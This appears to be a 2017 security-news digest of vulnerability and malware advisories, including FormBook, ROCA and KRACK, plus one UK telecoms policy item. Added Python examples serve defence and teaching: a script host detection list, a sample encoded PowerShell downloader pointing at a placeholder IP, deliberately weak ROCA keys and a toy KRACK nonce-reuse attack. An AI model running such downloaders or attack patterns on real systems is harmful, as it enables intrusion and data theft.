
FormBook Infostealer Malware

FormBook has grown in popularity recently and has been spotted as part of several malware distribution campaigns. It can be purchased for a relatively low price and is able to execute commands from its command and control (C2) server, enabling the attacker to execute files, start processes and steal passwords.

A more notable feature of the kit, which its creator calls the “Lagos Island method”, disables user-mode hooking and Application Programming Interface (API) monitoring on the target system, blinding the security tools and sandboxes that rely on them.

The malware has been deployed through many files and methods, including malicious links in .pdf files, macro-enabled .doc files and archive files (such as .zip and .rar) containing .exe payloads.

Affected Platforms:

Microsoft Windows – all versions

Resolution:

  • Ensure users are aware of basic phishing practices (don’t open attachments from senders you don’t recognise).
  • Maintain up-to-date anti-virus.
  • Treat attachments in PDF, DOC, XLS, ZIP, RAR, ACE and ISO formats with suspicion, particularly archives that contain executables.
  • Monitor logs for indicators of compromise.
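As an added example (not FormBook analysis code or any vendor’s tooling), the following script triages an e-mail attachment archive for the lure types named above: executables recognised by magic bytes rather than by name, double extensions such as Invoice.pdf.exe, macro-enabled Office files and encrypted members. It uses only the Python standard library, so RAR, ACE and ISO containers are flagged for a sandbox rather than opened; the sample archive it inspects is constructed inline.

```python
"""Triage of an e-mail attachment archive for FormBook-style lures (archives
carrying .exe payloads, macro-enabled Office files).  Added example using only
the standard library; RAR/ACE/ISO containers are flagged, not parsed."""
import io
import zipfile

EXECUTABLE_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse", "vbs",
                  "vbe", "wsf", "hta", "ps1", "lnk", "dll"}
MACRO_CAPABLE_EXT = {"docm", "dotm", "xlsm", "xltm", "pptm"}
OPAQUE_CONTAINER_EXT = {"rar", "ace", "iso", "img", "7z"}   # not parsed here
PE_MAGIC = b"MZ"
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"               # legacy .doc/.xls
MAX_MEMBER_BYTES = 4 * 1024 * 1024                            # zip-bomb guard


def _ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def _has_vba_project(blob: bytes) -> bool:
    """OOXML files are zips; a vbaProject.bin part means embedded macros."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def inspect_member(name: str, data: bytes) -> list:
    """Return (member, tag) findings for one archive member, judging by
    content (magic bytes) first and by file name second."""
    tags, ext = [], _ext(name)
    if data.startswith(PE_MAGIC):
        tags.append("pe-magic")                 # a Windows executable, whatever it is called
    elif ext in EXECUTABLE_EXT:
        tags.append("exec-extension")
    if name.count(".") >= 2 and ext in EXECUTABLE_EXT:
        tags.append("double-extension")         # e.g. Invoice.pdf.exe
    if data.startswith(ZIP_MAGIC) and ext in MACRO_CAPABLE_EXT and _has_vba_project(data):
        tags.append("vba-macro")
    if data.startswith(OLE_MAGIC):
        tags.append("ole-binary")               # legacy Office binary; may carry VBA
    if ext in OPAQUE_CONTAINER_EXT:
        tags.append("opaque-container")         # hand to a sandbox that can open it
    return [(name, t) for t in tags]


def triage_archive(blob: bytes, depth: int = 0) -> list:
    """Walk a zip attachment (nested zips to depth 2) and collect findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:            # encrypted member: password is usually in the mail body
                findings.append((info.filename, "encrypted"))
                continue
            with zf.open(info) as fh:
                data = fh.read(MAX_MEMBER_BYTES)
            findings += inspect_member(info.filename, data)
            if _ext(info.filename) == "zip" and depth < 2 and data.startswith(ZIP_MAGIC):
                findings += [(f"{info.filename}/{n}", t) for n, t in triage_archive(data, depth + 1)]
    return findings


def build_sample_attachment() -> bytes:
    """Constructed sample lure archive (not a real malware sample): a
    double-extension PE stub, a macro-enabled .docm and a harmless text file."""
    docm = io.BytesIO()
    with zipfile.ZipFile(docm, "w") as d:
        d.writestr("[Content_Types].xml", "<Types/>")
        d.writestr("word/document.xml", "<w:document/>")
        d.writestr("word/vbaProject.bin", OLE_MAGIC + b"\0" * 64)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Invoice_2017.pdf.exe", PE_MAGIC + b"\0" * 126)
        z.writestr("Order.docm", docm.getvalue())
        z.writestr("readme.txt", "Please see the attached invoice.")
    return outer.getvalue()


if __name__ == "__main__":
    for member, tag in triage_archive(build_sample_attachment()):
        print(f"{tag:18} {member}")
```

The magic-byte check comes first deliberately: renaming a PE to .pdf defeats extension filters but not the MZ header, while a double extension is a naming trick worth reporting on its own even when the content check already fired.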





Microsoft Internet Explorer 9, 10 and 11 Multiple Flaws

Multiple vulnerabilities were reported in Microsoft Internet Explorer. A remote user can cause arbitrary code to be executed on the target user’s system. A remote user can obtain potentially sensitive information on the target system.

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and execute arbitrary code on the target user’s system [CVE-2017-11822, CVE-2017-11813].

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and access potentially sensitive information on the target user’s system [CVE-2017-11790].

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and execute arbitrary code on the target user’s system [CVE-2017-11793, CVE-2017-11809, CVE-2017-11810]. This can also be exploited via an embedded ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the IE rendering engine.

Hui Gao of Palo Alto Networks, Heige (a.k.a. SuperHei) of Knownsec 404 Security Team, Jaanus Kp of Clarified Security (via Trend Micro’s Zero Day Initiative), Dmitri Kaslov of Telspace Systems, Yixiang Zhu of National Engineering Lab for Mobile Internet System and Application Security, China, Lokihart of Google Project Zero, Ivan Fratric of Google Project Zero, and Atte Kettunen of F-Secure reported these vulnerabilities.

Impact:   A remote user can create content that, when loaded by the target user, will execute arbitrary code on the target user’s system.

A remote user can obtain potentially sensitive information on the target system.

Solution:   The vendor has issued a fix.

The Microsoft advisories are available at:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11809
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11822





ISMInjector Trojan

ISMInjector is a trojan that injects malware into legitimate processes and has anti-analysis capabilities to avoid detection.

A spear-phishing campaign is currently being used to deliver the trojan. The attackers send malicious .zip attachments containing Microsoft Word documents. A macro in the Word document runs a PowerShell command that begins the installation of ISMInjector, exploiting the CVE-2017-0199 vulnerability.

Affected Platforms:

  • Microsoft Office 2007 (SP3), 2010 (SP2), 2013 (SP1) and 2016
  • Microsoft Windows Vista SP2
  • Windows Server 2008 SP2
  • Windows 7 SP1
  • Windows 8

To prevent and detect a trojan infection, ensure that:

  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, antivirus and other security products are kept up to date.
  • All day to day computer activities such as email and internet are performed using non-administrative accounts.
  • Strong password policies are in place and password reuse is discouraged.
  • Network, proxy and firewall logs are monitored for suspicious activity.
  • Credentials for any account used from an infected machine are reset from a clean computer.
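The delivery chain above leaves one behavioural signal that does not depend on the final payload: an Office process spawning PowerShell or another script host. As an added example (not code from the advisory or from any vendor product), the following script applies that rule to constructed process-creation events modelled on Sysmon Event ID 1 fields, and decodes an -EncodedCommand argument so an analyst can read the first stage. The paths, the downloader one-liner and the 203.0.113.5 host are made up for the demo.

```python
"""Office-spawns-script-host detection over constructed process-creation
events (Sysmon Event ID 1 fields as JSON lines).  Added example; the events,
paths and downloader one-liner are invented, not taken from the campaign."""
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# -e, -ec, -enc and -EncodedCommand all take a base64 UTF-16LE script
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def image_name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Recover the script behind -EncodedCommand; None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: dict):
    """Return an alert dict for an Office-spawns-script-host event, else None."""
    if event.get("EventID") != 1:
        return None
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    return {"parent": parent, "child": child, "cmdline": cmdline,
            "decoded": decode_encoded_command(cmdline)}


def scan(lines):
    """Run analyse() over JSON lines, keeping only the alerts."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = analyse(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


def sample_events():
    """Constructed events: a normal Word launch, Word spawning an encoded
    PowerShell downloader, Word's benign print helper, and an admin's shell."""
    stage1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s1')"
    enc = base64.b64encode(stage1.encode("utf-16-le")).decode()
    events = [
        {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
         "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
         "CommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.doc"'},
        {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {enc}"},
        {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
         "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
        {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell.exe Get-Date"},
    ]
    return [json.dumps(e) for e in events]


if __name__ == "__main__":
    for a in scan(sample_events()):
        print(f"ALERT {a['parent']} -> {a['child']}: {a['decoded'] or a['cmdline']}")
```

The parent/child pairing is what keeps the rule quiet: PowerShell launched from cmd.exe or Word spawning its print helper produce no alert, while the one event that matches also yields the decoded first stage for triage.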


RSA Encryption Vulnerability – Practical Factorisation Attack

Flawed RSA key generation in cryptographic chips manufactured by Infineon Technologies has weakened every key those chips produced, and with it whatever the keys protect: stored credentials, encrypted disks and documents, and signatures. The flaw is present in Infineon cryptographic smartcards, security tokens, chipsets and Trusted Platform Modules (TPMs), and these components are also integrated into the authentication, signature and encryption tokens of other vendors.

The Return of Coppersmith’s Attack (ROCA) vulnerability lies in the RSA keypair generation routine of Infineon’s cryptographic library, including as used by the TPMs that cryptographically sign for and protect computer systems and services. The primes the library generates have a special structure (each is of the form k·M + (65537^a mod M) for a fixed primorial M), so the resulting keys carry far less entropy than their length suggests. This allows a “practical factorisation” attack: a vulnerable public key can be recognised from the modulus alone, and the corresponding private key recovered from the public key with a feasible amount of computation. The attack is practical for common key lengths, including 1024 and 2048 bits.

Note that the RSA algorithm itself is not at fault; the flaw is in the affected products’ implementation of key generation, which produces poorly randomised primes.
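The structure described above is what makes a vulnerable key recognisable from its public half. As an added example (not the researchers’ roca-detect tool), the following Python implements the fingerprint test: the modulus is reduced modulo each small prime r and checked against the subgroup generated by 65537 mod r. To have something to flag, it also builds a 2×256-bit demo modulus in the vulnerable form and a control modulus from ordinary random primes; the key size and seed are assumptions for the demo, not real Infineon parameters.

```python
"""ROCA public-key fingerprint.  Vulnerable Infineon keys use primes of the
form p = k*M + (65537^a mod M) with M a primorial, so the modulus N = p*q
satisfies N mod r in <65537> (the subgroup generated by 65537 mod r) for
every small prime r dividing M.  Added example, not the researchers'
roca-detect tool: the demo key is a 2x256-bit modulus built here in the
vulnerable form purely so the test has something to flag."""
import random

# Odd primes up to 167; with 2 their product is the primorial M of the smallest
# (512-bit) affected key size, and the M for every larger size is a multiple of
# it, so this residue test fingerprints all affected key lengths.
SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59,
                61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127,
                131, 137, 139, 149, 151, 157, 163, 167]
GENERATOR = 65537
M = 2
for _r in SMALL_PRIMES:
    M *= _r                                   # ~219-bit primorial


def subgroup(r: int, g: int = GENERATOR) -> set:
    """Elements of the cyclic subgroup of (Z/rZ)* generated by g."""
    elems, x = set(), 1
    while x not in elems:
        elems.add(x)
        x = x * g % r
    return elems


RESIDUES = {r: subgroup(r) for r in SMALL_PRIMES}


def roca_fingerprint(n: int) -> bool:
    """True if n mod r lies in <65537> mod r for every tested prime r.
    Any modulus with the ROCA structure passes; an honest random modulus
    passes all 38 tests only with vanishingly small probability."""
    return all(n % r in RESIDUES[r] for r in SMALL_PRIMES)


def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin with random bases (textbook form)."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    for r in SMALL_PRIMES:
        if n % r == 0:
            return n == r
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def roca_style_prime(bits: int, rng: random.Random) -> int:
    """A prime of the flawed form k*M + (65537^a mod M); the only entropy is
    in (k, a), which is what makes the private key recoverable."""
    lo, hi = (1 << (bits - 1)) // M + 1, (1 << bits) // M
    while True:
        p = rng.randrange(lo, hi) * M + pow(GENERATOR, rng.getrandbits(64), M)
        if is_probable_prime(p):
            return p


def random_prime(bits: int, rng: random.Random) -> int:
    """Control: an ordinary random prime with no special structure."""
    while True:
        c = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(c):
            return c


def make_demo_moduli(seed: int = 2017, bits: int = 256):
    """Return (roca_modulus, honest_modulus), both about 2*bits wide."""
    rng = random.Random(seed)
    roca_n = roca_style_prime(bits, rng) * roca_style_prime(bits, rng)
    honest_n = random_prime(bits, rng) * random_prime(bits, rng)
    return roca_n, honest_n


if __name__ == "__main__":
    roca_n, honest_n = make_demo_moduli()
    print("ROCA-structured modulus flagged:", roca_fingerprint(roca_n))    # True
    print("Honest random modulus flagged: ", roca_fingerprint(honest_n))  # False
```

To test real keys, parse the modulus out of a certificate or SSH/PGP public key and pass it to roca_fingerprint(); the test needs only the public key, which is also why an attacker can select targets from public key material alone.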

Affected Platforms:

  • Infineon
  • Google
  • Lenovo
  • HP
  • Fujitsu
  • Microsoft
  • If a vendor is not listed, do not assume its devices are unaffected: the flawed library was NIST FIPS 140-2 and CC EAL 5+ certified, so certification is no guarantee. Test the public keys the device produces directly.

Resolution:

  • Users and administrators are encouraged to apply the necessary updates. HP, Google, Microsoft, Lenovo and Fujitsu have patches available. Note that a firmware update fixes the generator only: keys generated before the update remain weak and must be regenerated, and any certificates issued for them reissued.
  • Where keys cannot be regenerated on fixed hardware, use key lengths above 2048 bits; the published attack is practical up to 2048 bits, although the structural weakness (and the fingerprint) remains in longer keys.
  • If a sensitive device cannot be patched, consider replacing the device.

Last week, Lenovo, Microsoft, Google and Infineon each issued security bulletins regarding the weakness and warned customers to update their affected systems.




Sophos UTM Up2Date 9.505 Released

Today Sophos have released Sophos UTM 9.505. The release will be rolled out in phases: in phase 1 the update package can be downloaded from the FTP server, and in phase 2 Sophos will distribute it via the Up2Date servers.

Up2Date Information

News

  • Security Release

Remarks

  • System will be rebooted
  • Connected APs will perform firmware upgrade
  • Connected REDs will perform firmware upgrade

Bugfixes

  • NUTM-8984 [RED] WPA2 KRACK vulnerability fixes for RED15w
  • NUTM-8789 [Wireless] WPA2 KRACK vulnerability fixes


 

Reforms To Boost UK’s Mobile Phone Infrastructure

People in areas of the UK with poor mobile coverage will soon get a significant boost to their connections thanks to Government action to speed up the rollout of mobile and broadband services.

Reforms made today to outdated legislation will reduce the costs of housing phone masts and other communications infrastructure on private land. This opens the way for faster and more reliable broadband and mobile services, particularly in rural areas.

Changes to the UK Electronic Communications Code will:

  • bring down the rents telecoms operators pay to landowners to install equipment to be more in line with utilities providers, such as gas and water;
  • make it easier for operators to upgrade and share their equipment with other operators to help increase coverage;
  • make it easier for telecoms operators and landowners to resolve legal disputes.





Matt Hancock, Minister of State for Digital, said:

It’s not good enough that many people are struggling with poor mobile and broadband connections which is why we are improving coverage across the UK.

We want everyone to benefit from the growth of digital services. Removing these outdated restrictions will help promote investment in new technologies such as 5G, and give mobile operators more freedom to improve their networks in hard-to-reach places.

By the end of the year all mobile operators are required to deliver coverage to 90 per cent of the UK and 95 per cent of all homes and businesses will be able to get superfast broadband, but more needs to be done.

These reforms will help to drive investment and stimulate the continued growth, rollout and maintenance of communication technology infrastructure, an increasingly significant area of the UK’s economy.

Hamish MacLeod, Director of Mobile UK said:

The Electronic Communications Code is an important piece of the puzzle alongside further planning reform that will help mobile operators to overcome the challenges they face with expanding their networks, while also developing innovative services for customers.

Good mobile connectivity is no longer an optional extra. It is essential infrastructure as core to modern economic activity as broadband, electricity and other essential services.

Mark Talbot FRICS, Chair of the Royal Institution of Chartered Surveyors (RICS) Telecoms Forum Board, said:

RICS recognises the critical role that a modern, efficient and equitable digital infrastructure has on the future development of the UK economy. RICS has worked closely with our colleagues in DCMS to ensure that the new Code enables investment in our national digital infrastructure whilst balancing the needs of the public and private property owners.

With high speed internet seen by many as the fourth utility service the public and businesses expect access to digital services when they want and as they want, and RICS believes that the reformed Code is a great step forward towards this ultimate goal.

The old Electronic Communications Code was originally enacted in 1984, and became out-of-date as technology evolved, making it difficult for landowners and network operators to reach agreements and resolve disputes when rolling out modern digital infrastructure.

The Government reformed the Code through the Digital Economy Act, which received Royal Assent in April. The supporting regulations laid in Parliament today will bring the new Code into force, which is expected to take effect in December 2017.




HPE Intelligent Management Center Service Operation Management Flaw

A vulnerability was reported in HPE Intelligent Management Center Service Operation Management. A remote user can obtain files on the target system.

A remote user can send a specially crafted request to download arbitrary files on the target system.

Tenable Inc. reported this vulnerability.

Impact:   A remote user can obtain files on the target system.

Solution:   HPE has issued a fix (SOM 7.3 E0501P01).

RESOLUTION

HPE has made the following software updates to resolve the vulnerability in Intelligent Management Center Service Operation Management. The updates that address the vulnerability are in version 7.3 E0501P01.

  • iMC SOM – Version: Fixed in IMC SOM 7.3 E0501P01
    • HP Network Products
      • JG139A HPE IMC Service Operation Management Software Module License
      • JG139AAE HPE IMC Service Operation Management Software Module E-LTU

The HPE advisory is available at:

Vendor URL:  h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03776en_us

CVE Reference:   CVE-2017-12555





Oracle Issues Fix for Oracle Linux – KRACK WPA2 Hack

Multiple vulnerabilities were reported in wpa_supplicant. A remote user on the wireless network can access and modify data on the wireless network.

A remote user within range of the wireless network can record and replay retransmissions of part of the 802.11i 4-way handshake of the WPA and WPA2 protocols to force a reinstallation of the pairwise transient key, a group key, or an integrity key and force a reset of the incremental transmit packet number nonce and the receive replay counter. As a result, the remote user can replay encrypted packets, decrypt packets, and forge packets.

Both client systems and access points are affected.

A remote user on the wireless network can reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13077].

A remote user on the wireless network can reinstall the group key (GTK) [CVE-2017-13078, CVE-2017-13080].

A remote user on the wireless network can reinstall the integrity group key (IGTK) [CVE-2017-13079, CVE-2017-13081].

A remote user on the wireless network can retransmit the Fast BSS Transition (FT) Reassociation Request and reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13082].

A remote user on the wireless network can reinstall the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake [CVE-2017-13086].

A remote user on the wireless network can reinstall the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13087].

A remote user on the wireless network can reinstall the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13088].




This set of vulnerabilities is referred to as KRACK (Key Reinstallation AttaCK).

The original advisory is available at:

https://papers.mathyvanhoef.com/ccs2017.pdf

Additional information is available at:

https://www.krackattacks.com/

Mathy Vanhoef and Frank Piessens from Katholieke Universiteit Leuven reported these vulnerabilities. John Van Boxtel from Cypress reported one vulnerability.

[note: The vulnerabilities reside in the WPA and WPA2 protocol specification and are not due to incorrect vendor implementation of the standards.]

Impact:   A remote user on the wireless network can access and modify data on the wireless network.

Solution:   Oracle has issued a fix for CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, and CVE-2017-13087.

The Oracle Linux advisory is available at:

http://linux.oracle.com/errata/ELSA-2017-2911.html

Vendor URL:  linux.oracle.com/errata/ELSA-2017-2911.html 




Red Hat Issues Fix KRACK WPA2 WiFi

Multiple vulnerabilities were reported in wpa_supplicant. A remote user on the wireless network can access and modify data on the wireless network.

A remote user within range of the wireless network can record and replay retransmissions of part of the 802.11i 4-way handshake of the WPA and WPA2 protocols to force a reinstallation of the pairwise transient key, a group key, or an integrity key and force a reset of the incremental transmit packet number nonce and the receive replay counter. As a result, the remote user can replay encrypted packets, decrypt packets, and forge packets.

Both client systems and access points are affected.

A remote user on the wireless network can reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13077].

A remote user on the wireless network can reinstall the group key (GTK) [CVE-2017-13078, CVE-2017-13080].

A remote user on the wireless network can reinstall the integrity group key (IGTK) [CVE-2017-13079, CVE-2017-13081].

A remote user on the wireless network can retransmit the Fast BSS Transition (FT) Reassociation Request and reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13082].

A remote user on the wireless network can reinstall the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake [CVE-2017-13086].

A remote user on the wireless network can reinstall the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13087].

A remote user on the wireless network can reinstall the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13088].
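To make the retransmission attack concrete, the following is an added toy model (not code from the advisory, from wpa_supplicant or from the researchers) that serves both the Oracle Linux and Red Hat write-ups above: a client that follows the specification reinstalls the PTK on a replayed message 3 and resets its packet number, so two frames are encrypted under the same key and nonce and one known frame exposes the other; a patched client refuses to reinstall a key already in use. The keystream function, the PTK value and the frame contents are constructed for the demo, and CCMP itself is replaced by a hash-based stream cipher.

```python
"""Toy model of the WPA2 4-way-handshake key reinstallation (KRACK,
CVE-2017-13077) and of the fix.  Added example, not code from the advisory
or from wpa_supplicant: a hash-based keystream stands in for CCMP, and the
handshake is reduced to message 3 and the data frames that follow it."""
import hashlib


def keystream(key: bytes, packet_number: int, length: int) -> bytes:
    """Keystream fully determined by (key, packet number), as in CCMP's CTR
    mode where the packet number is the nonce.  Constructed for the demo."""
    out, block = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + packet_number.to_bytes(6, "big")
                              + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Client-side pairwise-key state.  patched=False follows the protocol
    as specified: every accepted message 3 (re)installs the PTK and resets
    the transmit packet number, which is exactly what KRACK abuses."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.tx_pn = 0                      # transmit packet number (CCMP nonce)

    def handle_msg3(self, ptk: bytes) -> str:
        """Process message 3, genuine or replayed; always answers message 4
        (the AP retransmits message 3 whenever it sees no message 4)."""
        if self.patched and ptk == self.ptk:
            return "msg4"                   # fix: never reinstall a key already in use
        self.ptk = ptk
        self.tx_pn = 0                      # spec-mandated reset on key installation
        return "msg4"

    def send(self, plaintext: bytes):
        """Encrypt one data frame; returns (packet_number, ciphertext)."""
        self.tx_pn += 1
        return self.tx_pn, xor(plaintext, keystream(self.ptk, self.tx_pn, len(plaintext)))


def run_attack(patched: bool) -> dict:
    """A man-in-the-middle captures message 3, lets the client send one frame,
    then replays message 3 before the next frame.  After the nonce reset the
    two frames share a keystream, so a known frame exposes the other one."""
    ptk = hashlib.sha256(b"demo PTK (constructed, not derived from a real handshake)").digest()
    client = Supplicant(patched)
    client.handle_msg3(ptk)                          # genuine message 3
    known = b"GET /index.html HTTP/1.1\r\n"          # frame with predictable content
    secret = b"Cookie: session=s3cr3t\r\n"           # frame the attacker wants
    pn1, ct1 = client.send(known)
    client.handle_msg3(ptk)                          # replayed message 3
    pn2, ct2 = client.send(secret)
    recovered = None
    if pn1 == pn2:                                   # same key + same nonce => same keystream
        recovered = xor(xor(ct1, ct2), known)        # ct1 ^ ct2 == known ^ secret
    return {"nonces": (pn1, pn2), "recovered": recovered, "secret": secret}


if __name__ == "__main__":
    for patched in (False, True):
        r = run_attack(patched)
        print("patched" if patched else "vulnerable", r["nonces"], r["recovered"])
```

The same reset also hits the receive replay counter, which is what lets the attacker replay frames towards the client; the group-key, FT and TDLS CVEs listed above are the same reinstallation pattern applied to other handshakes. wpa_supplicant 2.4 and 2.5 behaved worse than this model: the client cleared the PTK from memory after the first installation, so the replayed message 3 installed an all-zero key.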




This set of vulnerabilities is referred to as KRACK (Key Reinstallation AttaCK).

The original advisory is available at:

https://papers.mathyvanhoef.com/ccs2017.pdf

Additional information is available at:

https://www.krackattacks.com/

Mathy Vanhoef and Frank Piessens from Katholieke Universiteit Leuven reported these vulnerabilities. John Van Boxtel from Cypress reported one vulnerability.

[Editor’s note: The vulnerabilities reside in the WPA and WPA2 protocol specification and are not due to incorrect vendor implementation of the standards.]

Impact:   A remote user on the wireless network can access and modify data on the wireless network.

Solution:   Red Hat has issued a fix for CVE-2017-13077, CVE-2017-13078, CVE-2017-13080, and CVE-2017-13087.

The Red Hat advisory is available at:

https://access.redhat.com/errata/RHSA-2017:2911

Vendor URL:  access.redhat.com/errata/RHSA-2017:2911

Cause:   Access control error, State error

Underlying OS:  Linux (Red Hat Enterprise)





Security Updates Available For Flash Player – APSB17-32

Adobe has released a security update for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. This update addresses a critical type confusion vulnerability that could lead to code execution.

Adobe is aware of a report that an exploit for CVE-2017-11292 exists in the wild, and is being used in limited, targeted attacks against users running Windows.

Affected Product Versions

Adobe Flash Player Desktop Runtime – Version 27.0.0.159 – Windows, Macintosh

Adobe Flash Player for Google Chrome – Version 27.0.0.159 – Windows, Macintosh, Linux and Chrome OS

Adobe Flash Player for Microsoft Edge and Internet Explorer 11 – Version 27.0.0.130 – Windows 10 and 8.1

Adobe Flash Player Desktop Runtime – Version 27.0.0.159 – Linux

How To Update

  • Adobe recommends users of the Adobe Flash Player Desktop Runtime for Windows, Macintosh and Linux update to Adobe Flash Player 27.0.0.170 via the update mechanism within the product or by visiting the Adobe Flash Player Download Center.
  • Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 27.0.0.170 for Windows, Macintosh, Linux and Chrome OS.
  • Adobe Flash Player installed with Microsoft Edge and Internet Explorer 11 for Windows 10 and 8.1 will be automatically updated to the latest version, which will include Adobe Flash Player 27.0.0.170.
  • Please visit the Flash Player Help page for assistance in installing Flash Player.

Microsoft has also published a corresponding advisory for the Flash Player component in Edge and Internet Explorer 11: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170018

Users who have selected the option to ‘Allow Adobe to install updates’ will receive the update automatically. Users who do not have the ‘Allow Adobe to install updates’ option enabled can install the update via the update mechanism within the product when prompted.

How To Check Your Adobe Flash Version

To verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select “About Adobe (or Macromedia) Flash Player” from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.